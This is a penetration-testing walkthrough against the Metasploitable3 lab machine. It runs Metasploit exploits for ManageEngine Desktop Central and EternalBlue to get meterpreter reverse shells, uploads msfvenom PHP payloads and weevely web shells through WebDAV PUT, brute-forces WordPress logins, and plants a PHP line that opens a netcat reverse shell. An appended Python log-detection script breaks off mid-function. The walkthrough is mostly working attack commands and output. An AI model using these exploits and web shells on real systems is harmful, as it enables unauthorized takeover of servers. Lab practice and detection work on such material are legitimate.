ManageEngine Desktop Central 9
root@kali:~# nmap 192.168.119.108 -sV -A -v
In the scan results we see that ports 8020 and 8383 on the Metasploitable3 machine are running Apache httpd.
So let's also use these ports and check whether there is anything we can reach through the browser. (What was it again? Enumeration is the key.)
Well, look at that: we have reached the ManageEngine Desktop Central login screen. Starting from the information this page gives us, let's begin researching what we can obtain from it.
msf5 > search manageengine
When we run the command above, we see that there is a published exploit for ManageEngine Desktop Central 9. (If the search had returned nothing, we would have asked Google whether any vulnerability had been identified.)
24 exploit/windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability
msf5 > use exploit/windows/http/manageengine_connectionid_write
msf5 exploit(windows/http/manageengine_connectionid_write) > show options
Module options (exploit/windows/http/manageengine_connectionid_write):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8020 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for ManageEngine Desktop Central
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 ManageEngine Desktop Central 9 on Windows
msf5 exploit(windows/http/manageengine_connectionid_write) > set RHOSTS 192.168.119.108
RHOSTS => 192.168.119.108
msf5 exploit(windows/http/manageengine_connectionid_write) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/manageengine_connectionid_write) > set lhost 192.168.119.107
lhost => 192.168.119.107
msf5 exploit(windows/http/manageengine_connectionid_write) > show options
Module options (exploit/windows/http/manageengine_connectionid_write):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.119.108 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8020 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for ManageEngine Desktop Central
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.119.107 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 ManageEngine Desktop Central 9 on Windows
msf5 exploit(windows/http/manageengine_connectionid_write) >
msf5 exploit(windows/http/manageengine_connectionid_write) > exploit
[*] Started reverse TCP handler on 192.168.119.107:4444
[*] Creating JSP stager
[*] Uploading JSP stager DmMoU.jsp…
[*] Executing stager…
[*] Sending stage (180291 bytes) to 192.168.119.108
[*] Meterpreter session 1 opened (192.168.119.107:4444 -> 192.168.119.108:49340) at 2019-11-11 14:52:41 -0500
[!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/DmMoU.jsp' on the target
meterpreter >
[+] Deleted ../webapps/DesktopCentral/jspf/DmMoU.jsp
whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
SMB - Taking Over the Host via the EternalBlue Vulnerability from the Metasploit Console
msf5 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization
3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.119.108
RHOSTS => 192.168.119.108
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.119.107
lhost => 192.168.119.107
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
One of the most annoying situations when we try to exploit the EternalBlue vulnerability is the victim machine blue-screening. In that case we may need to make several attempts.
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.119.107:4444
[+] 192.168.119.108:445 – Host is likely VULNERABLE to MS17-010! – Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.108:445 – Connecting to target for exploitation.
[+] 192.168.119.108:445 – Connection established for exploitation.
[+] 192.168.119.108:445 – Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.108:445 – CORE raw buffer dump (51 bytes)
[*] 192.168.119.108:445 – 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.119.108:445 – 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.119.108:445 – 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 192.168.119.108:445 – 0x00000030 6b 20 31 k 1
[+] 192.168.119.108:445 – Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.108:445 – Trying exploit with 12 Groom Allocations.
[*] 192.168.119.108:445 – Sending all but last fragment of exploit packet
[*] 192.168.119.108:445 – Starting non-paged pool grooming
[+] 192.168.119.108:445 – Sending SMBv2 buffers
[+] 192.168.119.108:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.108:445 – Sending final SMBv2 buffers.
[*] 192.168.119.108:445 – Sending last fragment of exploit packet!
[*] 192.168.119.108:445 – Receiving response from exploit packet
[+] 192.168.119.108:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.108:445 – Sending egg to corrupted connection.
[*] 192.168.119.108:445 – Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.119.108
[*] Meterpreter session 2 opened (192.168.119.107:4444 -> 192.168.119.108:49292) at 2019-11-11 15:10:05 -0500
[+] 192.168.119.108:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.108:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.108:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > dir
Listing: C:\Windows\system32
============================
EternalBlue Manual Methods
root@kali:~/eternalblue# git clone https://github.com/interference-security/Eternalblue-Doublepulsar.git
Cloning into 'Eternalblue-Doublepulsar'...
remote: Enumerating objects: 67, done.
remote: Total 67 (delta 0), reused 0 (delta 0), pack-reused 67
Unpacking objects: 100% (67/67), done.
root@kali:~/eternalblue# cd Eternalblue-Doublepulsar/
root@kali:~/eternalblue/Eternalblue-Doublepulsar# ls -l
total 48
drwxr-xr-x 2 root root 4096 Nov 14 07:48 deps
-rwxr-xr-x 1 root root 5222 Nov 14 07:48 eternalblue_doublepulsar.rb
-rw-r--r-- 1 root root 1965 Nov 14 07:48 eternalblue-exploit.sh
-rw-r--r-- 1 root root 26461 Nov 14 07:48 LICENSE
-rw-r--r-- 1 root root 900 Nov 14 07:48 README.md
root@kali:~/eternalblue/Eternalblue-Doublepulsar# chmod +x eternalblue-exploit.sh
root@kali:~/eternalblue/Eternalblue-Doublepulsar# ./eternalblue-exploit.sh 192.168.119.108 445 60 WIN72K8R2 x64 lsass.exe adfw.dll
[*] Started: Thu 14 Nov 2019 08:23:49 AM EST
[*] Creating EternalBlue XML template
[*] Setting values in EternalBlue XML file
[*] Creating DoublePulsar XML template
[*] Setting values in DoublePulsar XML file
[*] Executing EternalBlue
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor…
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (52 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
0x00000030 6b 20 31 00 k 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
............DONE.
[+] Sending large SMBv1 buffer..DONE.
[+] Sending final SMBv2 buffers......DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor…
[+] Backdoor returned code: 10 – Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
HTTP PUT Method
root@kali:~# nmap -script http-methods -script-args http-methods.url-path='/uploads',http-methods.test-all -p 8585 192.168.119.108
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 15:11 EST
Nmap scan report for 192.168.119.108
Host is up (0.00031s latency).
PORT STATE SERVICE
8585/tcp open unknown
MAC Address: 08:00:27:36:17:67 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds
Nikto
root@kali:~# nikto -host http://192.168.119.108:8585/uploads
– Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.119.108
+ Target Hostname: 192.168.119.108
+ Target Port: 8585
+ Start Time: 2019-11-11 15:13:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /uploads/: Directory indexing found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.3.10 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /uploads/nikto-test-o7fmDVla.html, inode: W/1000000000b37a, size: 16, mtime: 59717c30c7ddd
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
+ Retrieved dav header: 1,2
+ Retrieved ms-author-via header: DAV
+ Uncommon header 'ms-author-via' found, with contents: DAV
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, DELETE, TRACE, PROPFIND, PROPPATCH, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPPATCH COPY PROPFIND LOCK UNLOCK listed as allowed)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /uploads/./: Directory indexing found.
+ /uploads/./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: /uploads//: Directory indexing found.
+ /uploads//: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ OSVDB-3268: /uploads/%2e/: Directory indexing found.
+ OSVDB-576: /uploads/%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: /uploads///: Directory indexing found.
+ OSVDB-119: /uploads/?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via ‘open directory browsing’. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-119: /uploads/?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via ‘open directory browsing’. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-3268: /uploads///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ OSVDB-3288: /uploads///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when /’s are requested.
Nmap HTTP PUT Meterpreter shell
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.119.107 lport=4444 -f raw > /root/ce-shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1116 bytes
root@kali:~#
root@kali:~# vim ce-shell.php
We delete the /* at the very beginning of the PHP file.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > set lhost 192.168.119.107
lhost => 192.168.119.107
msf5 exploit(multi/handler) >
root@kali:~# nmap -sV -script http-put -script-args http-put.url=’/uploads/ce-shell.php’,http-put.file=’/root/ce-shell.php’ -p 8585 192.168.119.108
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 15:19 EST
Nmap scan report for 192.168.119.108
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
8585/tcp open http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
|_http-put: ERROR: Failed to open file: \xE2\x80\x99/root/ce-shell.php\xE2\x80\x99
|_http-server-header: Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2
MAC Address: 08:00:27:36:17:67 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.75 seconds
msf5 > use auxiliary/scanner/http/http_put
msf5 auxiliary(scanner/http/http_put) > set rhosts 192.168.119.108
rhosts => 192.168.119.108
msf5 auxiliary(scanner/http/http_put) > set path /uploads
path => /uploads
msf5 auxiliary(scanner/http/http_put) > set filename ce-shell.php
filename => ce-shell.php
msf5 auxiliary(scanner/http/http_put) > set filedata file://root/ce-shell.php
msf5 auxiliary(scanner/http/http_put) > set rport 8585
rport => 8585
msf5 auxiliary(scanner/http/http_put) > exploit
http://192.168.119.108:8585/uploads/ce-shell.php
Boooom.
Compromising the Metasploitable 3 WordPress Site
root@kali:~# wpscan --url http://192.168.119.108:8585/wordpress/
WordPress Security Scanner by the WPScan Team
Version 3.7.3
WPScan.io - Online WordPress Vulnerability Scanner
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.119.108:8585/wordpress/
[+] Started: Mon Nov 11 15:33:02 2019
Interesting Finding(s):
[+] http://192.168.119.108:8585/wordpress/
| Interesting Entries:
| – Server: Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2
| – X-Powered-By: PHP/5.3.10
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.119.108:8585/wordpress/xmlrpc.php
| Found By: Link Tag (Passive Detection)
| Confidence: 100%
| Confirmed By: Direct Access (Aggressive Detection), 100% confidence
| References:
| – http://codex.wordpress.org/XML-RPC_Pingback_API
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| – https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.119.108:8585/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.119.108:8585/wordpress/wp-includes/rss-functions.php
| Interesting Entry: C:\wamp\www\wordpress\wp-includes\rss-functions.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| Reference: https://www.owasp.org/index.php/Full_Path_Disclosure
[+] Upload directory has listing enabled: http://192.168.119.108:8585/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.119.108:8585/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| – https://www.iplocation.net/defend-wordpress-from-ddos
| – https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.6.1 identified (Insecure, released on 2016-09-07).
| Detected By: Rss Generator (Passive Detection)
| – http://192.168.119.108:8585/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.6.1</generator>
| – http://192.168.119.108:8585/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.6.1</generator>
[+] WordPress theme in use: twentyfourteen
| Location: http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/readme.txt
| [!] The version is out of date, the latest version is 2.7
| Style URL: http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/style.css?ver=4.6.1
| Style Name: Twenty Fourteen
| Style URI: https://wordpress.org/themes/twentyfourteen/
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design…
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.8 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/style.css?ver=4.6.1, Match: 'Version: 1.8'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <======================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
[+] Finished: Mon Nov 11 15:33:25 2019
[+] Requests Done: 49
[+] Cached Requests: 5
[+] Data Sent: 16.31 KB
[+] Data Received: 200.305 KB
[+] Memory used: 182.352 MB
[+] Elapsed time: 00:00:23
root@kali:~#
msf5 > use auxiliary/scanner/http/wordpress_login_enum
msf5 auxiliary(scanner/http/wordpress_login_enum) > show options
Module options (auxiliary/scanner/http/wordpress_login_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE true yes Perform brute force authentication
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
ENUMERATE_USERNAMES true yes Enumerate usernames
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RANGE_END 10 no Last user id to enumerate
RANGE_START 1 no First user id to enumerate
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI / yes The base path to the wordpress application
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VALIDATE_USERS true yes Validate usernames
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/wordpress_login_enum) > set bruteforce_speed 100
bruteforce_speed => 100
msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /root/parola.txt
pass_file => /root/parola.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set user_file /root/users.txt
user_file => /root/users.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 192.168.119.108
RHOSTS => 192.168.119.108
msf5 auxiliary(scanner/http/wordpress_login_enum) > set rport 8585
rport => 8585
msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /wordpress
targeturi => /wordpress/
msf5 auxiliary(scanner/http/wordpress_login_enum) > run
Let the brute force begin. May the force be with us.
And it looks like we have obtained a set of user credentials we can log in with.
Boooom, we're in.
<?php echo shell_exec("nc.exe 192.168.119.107 4444 -e cmd.exe"); ?>
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.119.107] from (UNKNOWN) [192.168.119.108] 49551
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\wamp\www\wordpress>dir
dir
Volume in drive C is Windows 2008R2
Volume Serial Number is B421-16B4
Directory of C:\wamp\www\wordpress
09/26/2016 02:28 PM 255 .htaccess
09/24/2013 04:18 PM 418 index.php
03/05/2016 12:14 PM 19,935 license.txt
07/26/2018 04:55 AM 59,392 nc.exe
08/16/2016 12:39 PM 7,344 readme.html
05/24/2016 01:02 PM 5,456 wp-activate.php
09/07/2016 06:58 AM <DIR> wp-admin
12/19/2015 03:20 AM 364 wp-blog-header.php
05/23/2016 08:44 AM 1,477 wp-comments-post.php
12/16/2015 01:58 AM 2,853 wp-config-sample.php
09/26/2016 02:27 PM 3,118 wp-config.php
11/11/2019 01:27 PM <DIR> wp-content
05/24/2015 09:26 AM 3,286 wp-cron.php
09/07/2016 06:58 AM <DIR> wp-includes
05/23/2016 08:44 AM 2,382 wp-links-opml.php
04/14/2016 09:53 AM 3,353 wp-load.php
06/14/2016 01:51 PM 34,057 wp-login.php
07/13/2016 04:37 AM 7,786 wp-mail.php
08/13/2016 08:02 AM 13,920 wp-settings.php
05/24/2016 12:44 PM 29,890 wp-signup.php
11/30/2014 01:23 PM 4,035 wp-trackback.php
07/06/2016 04:40 AM 3,064 xmlrpc.php
19 File(s) 202,385 bytes
3 Dir(s) 47,074,127,872 bytes free
C:\wamp\www\wordpress>cd c:\
cd c:\
c:\>dir
dir
Volume in drive C is Windows 2008R2
Volume Serial Number is B421-16B4
Directory of c:\
07/16/2018 12:27 PM <DIR> glassfish
07/16/2018 12:45 PM 0 jack_of_diamonds.png
07/16/2018 12:43 PM 103 java0.log
07/16/2018 12:43 PM 103 java1.log
07/16/2018 12:43 PM 103 java2.log
07/16/2018 12:42 PM <DIR> ManageEngine
07/16/2018 12:30 PM <DIR> openjdk6
07/13/2009 07:20 PM <DIR> PerfLogs
07/16/2018 12:44 PM <DIR> Program Files
07/16/2018 12:42 PM <DIR> Program Files (x86)
07/16/2018 12:31 PM <DIR> RubyDevKit
07/25/2018 04:25 AM <DIR> tmp
07/16/2018 12:30 PM <DIR> tools
07/17/2018 01:03 PM <DIR> Users
07/16/2018 02:11 PM <SYMLINKD> vagrant [\\vboxsvr\vagrant]
07/17/2018 11:02 AM <DIR> wamp
11/11/2019 11:59 AM <DIR> Windows
10/07/2015 05:22 PM 226 __Argon__.tmp
5 File(s) 535 bytes
13 Dir(s) 47,074,127,872 bytes free
c:\>
Exploiting the Vulnerability with cadaver Using the PUT Method
root@kali:~# nano ce_shell.php
root@kali:~# cadaver http://192.168.119.108:8585/uploads/
dav:/uploads/> put ce_shell.php
Uploading ce_shell.php to `/uploads/ce_shell.php':
Progress: [=============================>] 100.0% of 1115 bytes succeeded.
dav:/uploads/>
http://192.168.119.108:8585/uploads/
root@kali:~# curl http://192.168.119.108:8585/uploads/ce_shell.php?e=ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::f430:5058:4e6f:2a95%11
IPv4 Address. . . . . . . . . . . : 192.168.119.108
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Tunnel adapter isatap.{F770E00C-2DAF-4DA9-8098-4AF2DFB8E7A5}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
root@kali:~#
root@kali:~# weevely generate basitparola /root/Desktop/vebasit.php
Generated '/root/Desktop/vebasit.php' with password 'basitparola' of 779 byte size.
root@kali:~#
root@kali:~# weevely http://192.168.119.108:8585/uploads/vebasit.php basitparola
[+] weevely 3.7.0
[+] Target: 192.168.119.108:8585
[+] Session: /root/.weevely/sessions/192.168.119.108/vebasit_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely>
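As an added defender-side example (not part of the original write-up), the Python below runs over constructed Apache access-log lines and flags the two web-side events this page produces: an executable file created with WebDAV PUT under /uploads and then requested (the nmap/http_put and cadaver uploads and the ?e=ipconfig call), and a burst of wp-login.php POSTs from one source followed by a 302 (the wordpress_login_enum run). The log lines, the second client address 192.168.119.50 and the threshold are sample values I constructed; the lab addresses from the page are reused only as sample data.

```python
import re
from collections import defaultdict

# Apache common-log fields we need: client IP, timestamp, method, path, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Only PUT carries the new file's name in the request line; MOVE/COPY name the
# target in the Destination header, which the access log does not record.
WRITE_METHODS = {"PUT"}
EXEC_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")


def _line(ip, ts, method, path, status, size="-"):
    """Build one constructed access-log line (sample data, not a lab capture)."""
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} {size}'


ATTACKER = "192.168.119.107"  # the page's lab address, reused only as a sample value
SAMPLE_LOG = [
    _line(ATTACKER, "11/Nov/2019:15:19:02 -0500", "OPTIONS", "/uploads/", 200),
    _line(ATTACKER, "11/Nov/2019:15:20:10 -0500", "PUT", "/uploads/ce-shell.php", 201),
    _line(ATTACKER, "11/Nov/2019:15:20:31 -0500", "GET", "/uploads/ce-shell.php", 200, 12),
    _line("192.168.119.50", "11/Nov/2019:15:25:00 -0500", "PUT", "/uploads/notes.txt", 201),
    _line(ATTACKER, "11/Nov/2019:15:40:00 -0500", "PUT", "/uploads/ce_shell.php", 201),
    _line(ATTACKER, "11/Nov/2019:15:40:12 -0500", "GET", "/uploads/ce_shell.php?e=ipconfig", 200, 540),
] + [  # twelve failed guesses (WordPress re-renders the login form with 200) ...
    _line(ATTACKER, f"11/Nov/2019:15:33:{5 + i:02d} -0500", "POST", "/wordpress/wp-login.php", 200, 3520)
    for i in range(12)
] + [  # ... then a success (302 to wp-admin), plus an unrelated normal login
    _line(ATTACKER, "11/Nov/2019:15:33:20 -0500", "POST", "/wordpress/wp-login.php", 302),
    _line("192.168.119.50", "11/Nov/2019:15:34:00 -0500", "POST", "/wordpress/wp-login.php", 302),
]


def parse(lines):
    """Yield one dict per line that matches the log format; skip anything else."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
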